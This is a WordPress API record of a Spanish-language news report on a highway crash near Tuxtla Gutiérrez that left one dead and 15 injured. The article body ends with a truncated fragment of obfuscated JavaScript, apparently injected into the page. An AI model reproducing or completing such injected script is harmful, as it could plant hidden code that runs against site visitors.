{"id":9979,"date":"2023-05-11T03:27:36","date_gmt":"2023-05-11T03:27:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9979"},"modified":"2023-05-11T03:27:36","modified_gmt":"2023-05-11T03:27:36","slug":"fuerte-accidente-en-el-tramo-tuxtla-san-cristobal-deja-un-saldo-preliminar-de-15-heridos-y-un-muerto","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9979","title":{"rendered":"Fuerte accidente en el tramo Tuxtla-San Crist\u00f3bal deja un saldo preliminar de 15 heridos y un muerto"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683774723804.jpg\" alt=\"\" class=\"wp-image-9980\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683774723804.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683774723804-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 10 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte accidente ocurrido este mi\u00e9rcoles en el tramo Tuxtla-San Crist\u00f3bal de Las Casas entre dos unidades particulares y una unidad de transporte p\u00fablico dej\u00f3 un saldo preliminar de 15 heridos y un muerto.<\/p>\n\n\n\n<p>De acuerdo con los primeros reportes, este accidente ocurri\u00f3 a la altura del Kil\u00f3metro 6+800 del citado tramo.<\/p>\n\n\n\n<p>Hasta el momento se desconocen las causas, sin embargo el impacto fue de lleno entre un coche de color rojo y la unidad de transporte p\u00fablico que cubre esa ruta.<\/p>\n\n\n\n<p>Tambi\u00e9n se vio involucrada una camioneta blanca.<\/p>\n\n\n\n<p>Al lugar arribaron los cuerpos de auxilio para atender a los lesionados que hasta el momento se desconoce el n\u00famero exacto.<\/p>\n\n\n\n<p>Hasta el momento se sabe que del impacto una persona perdi\u00f3 la vida en el lugar.<\/p>\n\n\n\n<p>Informaci\u00f3n en proceso.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 10 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte accidente ocurrido este mi\u00e9rcoles en el tramo Tuxtla-San Crist\u00f3bal de Las Casas entre dos unidades particulares y una unidad de transporte p\u00fablico dej\u00f3 un saldo preliminar de 15 heridos y un muerto. De acuerdo con los primeros reportes, este accidente ocurri\u00f3 a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9980,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9979","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9979","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9979"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9979\/revisions"}],"predecessor-version":[{"id":9981,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9979\/revisions\/9981"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9980"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9979"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9979"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9979"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}